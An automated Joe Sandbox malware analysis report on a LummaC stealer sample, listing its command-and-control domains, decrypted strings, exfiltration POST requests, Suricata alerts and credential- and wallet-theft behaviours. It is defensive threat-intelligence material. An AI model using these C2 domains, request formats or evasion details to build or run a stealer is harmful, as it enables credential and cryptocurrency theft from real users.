Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
k6A01XaeEn.exe

Overview

General Information

Sample name:k6A01XaeEn.exe
renamed because original name is a hash value
Original sample name:fd5fe344fef63284ed51951698535fca.exe
Analysis ID:1577869
MD5:fd5fe344fef63284ed51951698535fca
SHA1:edd4a2cda68245606465c920ad824d8eed5d0c56
SHA256:9465a7b43d43fbd350d67bb6d7720306525fc409d9189e7ac5a2ada996b08bf5
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • k6A01XaeEn.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\k6A01XaeEn.exe" MD5: FD5FE344FEF63284ED51951698535FCA)
    • WerFault.exe (PID: 7188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "necklacebudi.lat", "sustainskelet.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2340966551.0000000000A79000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1418:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000003.1940934471.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1940699958.0000000000B48000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2340676868.00000000009E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Process Memory Space: k6A01XaeEn.exe PID: 7736JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T20:54:16.261976+010020283713Unknown Traffic192.168.2.449730104.21.21.99443TCP
            2024-12-18T20:54:18.239271+010020283713Unknown Traffic192.168.2.449731104.21.21.99443TCP
            2024-12-18T20:54:20.632864+010020283713Unknown Traffic192.168.2.449732104.21.21.99443TCP
            2024-12-18T20:54:24.060830+010020283713Unknown Traffic192.168.2.449733104.21.21.99443TCP
            2024-12-18T20:54:27.078444+010020283713Unknown Traffic192.168.2.449734104.21.21.99443TCP
            2024-12-18T20:54:32.981624+010020283713Unknown Traffic192.168.2.449737104.21.21.99443TCP
            2024-12-18T20:54:39.281396+010020283713Unknown Traffic192.168.2.449742104.21.21.99443TCP
            2024-12-18T20:54:46.297827+010020283713Unknown Traffic192.168.2.449743104.21.21.99443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T20:54:16.970035+010020546531A Network Trojan was detected192.168.2.449730104.21.21.99443TCP
            2024-12-18T20:54:19.027809+010020546531A Network Trojan was detected192.168.2.449731104.21.21.99443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T20:54:16.970035+010020498361A Network Trojan was detected192.168.2.449730104.21.21.99443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T20:54:19.027809+010020498121A Network Trojan was detected192.168.2.449731104.21.21.99443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T20:54:16.261976+010020583611Domain Observed Used for C2 Detected192.168.2.449730104.21.21.99443TCP
            2024-12-18T20:54:18.239271+010020583611Domain Observed Used for C2 Detected192.168.2.449731104.21.21.99443TCP
            2024-12-18T20:54:20.632864+010020583611Domain Observed Used for C2 Detected192.168.2.449732104.21.21.99443TCP
            2024-12-18T20:54:24.060830+010020583611Domain Observed Used for C2 Detected192.168.2.449733104.21.21.99443TCP
            2024-12-18T20:54:27.078444+010020583611Domain Observed Used for C2 Detected192.168.2.449734104.21.21.99443TCP
            2024-12-18T20:54:32.981624+010020583611Domain Observed Used for C2 Detected192.168.2.449737104.21.21.99443TCP
            2024-12-18T20:54:39.281396+010020583611Domain Observed Used for C2 Detected192.168.2.449742104.21.21.99443TCP
            2024-12-18T20:54:46.297827+010020583611Domain Observed Used for C2 Detected192.168.2.449743104.21.21.99443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T20:54:14.474132+010020583601Domain Observed Used for C2 Detected192.168.2.4644611.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T20:54:22.529357+010020480941Malware Command and Control Activity Detected192.168.2.449732104.21.21.99443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://discokeyus.lat/xlAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat/apiHAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat/api06&cwnAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat/dlAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat/apiAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat/3Avira URL Cloud: Label: malware
            Source: https://discokeyus.lat/apijiAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat/apiMcubsAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat/Avira URL Cloud: Label: malware
            Source: https://discokeyus.lat/;oAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat:443/apiAvira URL Cloud: Label: malware
            Source: https://discokeyus.lat/apiUAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0.3.k6A01XaeEn.exe.2500000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "necklacebudi.lat", "sustainskelet.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "4h5VfH--"}
            Multi AV Scanner detection for submitted file
            Source: k6A01XaeEn.exeReversingLabs: Detection: 73%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: k6A01XaeEn.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeUnpacked PE file: 0.2.k6A01XaeEn.exe.400000.0.unpack
            Source: k6A01XaeEn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: number of queries: 1001

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49733 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:64461 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49730 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49737 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49734 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49743 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49731 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49732 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49742 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.21.99:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: grannyejh.lat
            Source: Malware configuration extractorURLs: crosshuaht.lat
            Source: Malware configuration extractorURLs: energyaffai.lat
            Source: Malware configuration extractorURLs: rapeflowwj.lat
            Source: Malware configuration extractorURLs: necklacebudi.lat
            Source: Malware configuration extractorURLs: sustainskelet.lat
            Source: Malware configuration extractorURLs: discokeyus.lat
            Source: Malware configuration extractorURLs: aspecteirs.lat
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.21.99:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.21.99:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: discokeyus.lat
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6ZHM4NAAMLPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18116Host: discokeyus.lat
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V0EFVHPNCHU9SBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8755Host: discokeyus.lat
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LQV78KY8PLN9TNUXAWQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20438Host: discokeyus.lat
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5FSAVCL8ZA8U7M6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: discokeyus.lat
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2HG77GWVKDAUVJU866User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568750Host: discokeyus.lat
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: k6A01XaeEn.exe, 00000000.00000003.2018293078.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2088649223.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2088366995.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: k6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/3
            Source: k6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/;o
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850513457.000000000321F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api06&cwn
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiH
            Source: k6A01XaeEn.exe, 00000000.00000003.1850513457.000000000321F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiMcubs
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiU
            Source: k6A01XaeEn.exe, 00000000.00000003.1850513457.000000000321F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiji
            Source: k6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/dl
            Source: k6A01XaeEn.exe, 00000000.00000003.2018238766.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2005608699.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/xl
            Source: k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936118211.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1940512058.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2018318661.0000000003245000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: k6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003269000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850465870.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
